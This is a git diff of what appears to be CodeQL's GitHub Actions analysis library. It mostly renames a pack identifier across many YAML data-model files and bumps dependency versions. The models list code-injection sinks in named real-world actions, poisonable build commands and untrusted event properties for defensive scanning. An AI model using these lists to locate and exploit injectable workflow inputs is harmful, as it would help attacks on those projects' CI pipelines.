.../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- .../manual/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- .../devorbitus_yq-action-output.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- .../manual/docker_build-push-action.model.yml | 2 +- ...3d_action-extract-unique-matches.model.yml | 2 +- .../manual/eficode_resolve-pr-refs.model.yml | 2 +- ql/lib/ext/manual/endbug_latest-tag.model.yml | 2 +- .../manual/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- .../manual/gabrielbb_xvfb-action.model.yml | 2 +- .../manual/game-ci_unity-builder.model.yml | 2 +- .../game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- .../manual/getsentry_action-release.model.yml | 2 +- .../ext/manual/github_codeql-action.model.yml | 2 +- .../go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...tson_pull-request-comment-branch.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../gradle_gradle-build-action.model.yml | 2 +- .../manual/haya14busa_action-cond.model.yml | 2 +- .../manual/hexlet_project-action.model.yml | 2 +- .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/manual/ilammy_setup-nasm.model.yml | 2 +- .../ext/manual/imjohnbo_issue-bot.model.yml | 2 +- .../ext/manual/iterative_setup-cml.model.yml | 2 +- .../ext/manual/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../jitterbit_get-changed-files.model.yml | 2 +- .../johnnymorganz_stylua-action.model.yml | 2 +- .../manual/jsdaniell_create-json.model.yml | 2 +- .../jsmith_changes-since-last-tag.model.yml | 2 +- .../jurplel_install-qt-action.model.yml | 2 +- .../ext/manual/jwalton_gh-ecr-push.model.yml | 4 ++-- .../kaisugi_action-regex-match.model.yml | 2 +- ...rpikpl_list-changed-files-action.model.yml | 2 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ql/lib/ext/manual/knu_changed-files.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- .../ext/manual/leafo_gh-actions-lua.model.yml | 2 +- .../leafo_gh-actions-luarocks.model.yml | 2 +- ...logs_gh-action-get-changed-files.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ...felipelaviola_parse-plain-dotenv.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- .../ext/manual/magefile_mage-action.model.yml | 2 +- .../manual/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- .../manual/marocchino_on_artifact.model.yml | 2 +- .../martinhaintz_ga-file-list.model.yml | 2 +- .../manual/mattdavis0351_actions.model.yml | 4 ++-- .../meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- .../manual/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/manual/mikefarah_yq.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/manual/msys2_setup-msys2.model.yml | 2 +- .../manual/mxschmitt_action-tmate.model.yml | 2 +- .../manual/mymindstorm_setup-emsdk.model.yml | 4 ++-- .../nanasess_setup-chromedriver.model.yml | 2 +- .../ext/manual/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/manual/nick-fields_retry.model.yml | 2 +- .../manual/octokit_graphql-action.model.yml | 2 +- .../manual/octokit_request-action.model.yml | 2 +- .../ext/manual/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- ...ulschuberth_regex-extract-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- ...r-murray_issue-forms-body-parser.model.yml | 2 +- .../plasmicapp_plasmic-action.model.yml | 2 +- .../potiuk_get-workflow-origin.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/manual/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- .../ext/manual/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ql/lib/ext/manual/read-file-actions.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- .../ext/manual/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/manual/release-kit_regex.model.yml | 2 +- .../renovatebot_github-action.model.yml | 2 +- .../rishabh510_path-lister-action.model.yml | 2 +- .../roots_issue-closer-action.model.yml | 2 +- .../manual/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/manual/ruby_setup-ruby.model.yml | 4 ++-- ...ction-detect-and-tag-new-version.model.yml | 4 ++-- .../ext/manual/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- .../ext/manual/snow-actions_eclint.model.yml | 2 +- .../stackhawk_hawkscan-action.model.yml | 2 +- .../step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- .../the-coding-turtle_ga-file-list.model.yml | 2 +- ql/lib/ext/manual/tibdex_backport.model.yml | 2 +- .../tim-actions_get-pr-commits.model.yml | 2 +- .../manual/timheuer_base64-to-file.model.yml | 2 +- .../manual/tj-actions_branch-names.model.yml | 2 +- ...tmelliottjr_extract-regex-action.model.yml | 2 +- .../trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- .../manual/tzkhan_pr-update-action.model.yml | 2 +- .../manual/veracode_veracode-sca.model.yml | 2 +- .../w3f_action-find-old-files.model.yml | 2 +- .../wearerequired_lint-action.model.yml | 2 +- .../ext/manual/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 2 +- ...rted_pull-request-comment-branch.model.yml | 2 +- .../manual/yumemi-inc_changed-files.model.yml | 2 +- .../manual/zaproxy_action-baseline.model.yml | 2 +- .../manual/zaproxy_action-full-scan.model.yml | 2 +- ...zentered_issue-forms-body-parser.model.yml | 2 +- 792 files changed, 833 insertions(+), 823 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 56fced44da8..3214ce52287 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4d28fa778e0..930a4344e12 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 7d40620e913..e1bfca52ea7 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: externallyTriggerableEventsDataModel data: - ["discussion"] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b402..bca33af8dc5 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: @@ -13,7 +13,7 @@ extensions: - ["qcastel/github-actions-maven/actions/maven"] - ["sonarsource/sonarcloud-github-action"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableCommandsDataModel # source: https://boostsecurityio.github.io/lotp/ data: @@ -61,7 +61,7 @@ extensions: - ["yarn"] - ["webpack"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 1e54fa6eca3..cf3d6df8094 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedEventPropertiesDataModel data: # TITLE diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml index 653f9e31c98..c81c048e45e 100644 --- a/ql/lib/ext/config/untrusted_gh_command.yml +++ b/ql/lib/ext/config/untrusted_gh_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGhCommandDataModel data: # diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/ql/lib/ext/config/untrusted_git_command.yml index e862267027a..05fda3e1cd9 100644 --- a/ql/lib/ext/config/untrusted_git_command.yml +++ b/ql/lib/ext/config/untrusted_git_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml index eb452983bfc..1fe00ad733b 100644 --- a/ql/lib/ext/config/vulnerable_actions.yml +++ b/ql/lib/ext/config/vulnerable_actions.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: vulnerableActionsDataModel data: diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml index 88e266d8142..f02a6bc20aa 100644 --- a/ql/lib/ext/config/workflow_runtime_data.yml +++ b/ql/lib/ext/config/workflow_runtime_data.yml @@ -1,9 +1,9 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: repositoryDataModel data: [] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: workflowDataModel data: [] diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index a098666dba0..ba6dbbe91e6 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 476c522f5ea..b3430655e01 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index ad369575c42..3c6e8718fb4 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index e68306a454c..fee02f3d3bd 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 923d267ac66..c102a42d3ea 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 9557cbbee80..77744b4ab47 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index eea604dc8dd..e9e6941e634 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 5ee8503193b..e0240360052 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 44795adc64a..cae561f7775 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index a1a7e28f572..18d893d4c53 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 792a00ea387..b40d68cc560 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 5ee9c5aefbe..9282d312fb8 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 8b438734d5d..f0636131cdb 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index a6222605575..4bac281500b 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 07c4cc427c1..3ee27175205 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 77adcd6151d..37c2873b508 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index fe453b3086d..231df2a7f87 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 6d5296ba6d1..94ba6559838 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 14600fdc23e..ab91a71fc0e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index a67988b08aa..b704cc54b82 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 663702e6418..b438360b5a6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index de7a728d096..05b822ebc4d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index 360eb948595..de7c35fa111 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 290712830e2..4ef3ce32bfe 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index d58063c2452..0efe533073b 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 784627c32ab..a472b1be979 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b4f5866b86d..409c3907786 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 77a7407adfb..29a0e582ec7 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index a97bce1de7a..5d88aaf0017 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 5bf814bcc69..fe2fb29bfa8 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 6a141053bbe..7107b1dd55d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 4fec81ed178..7ecc0cb0e61 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1290646ef6d..c75ff3a6914 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 60a023c9730..ed5dae96060 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 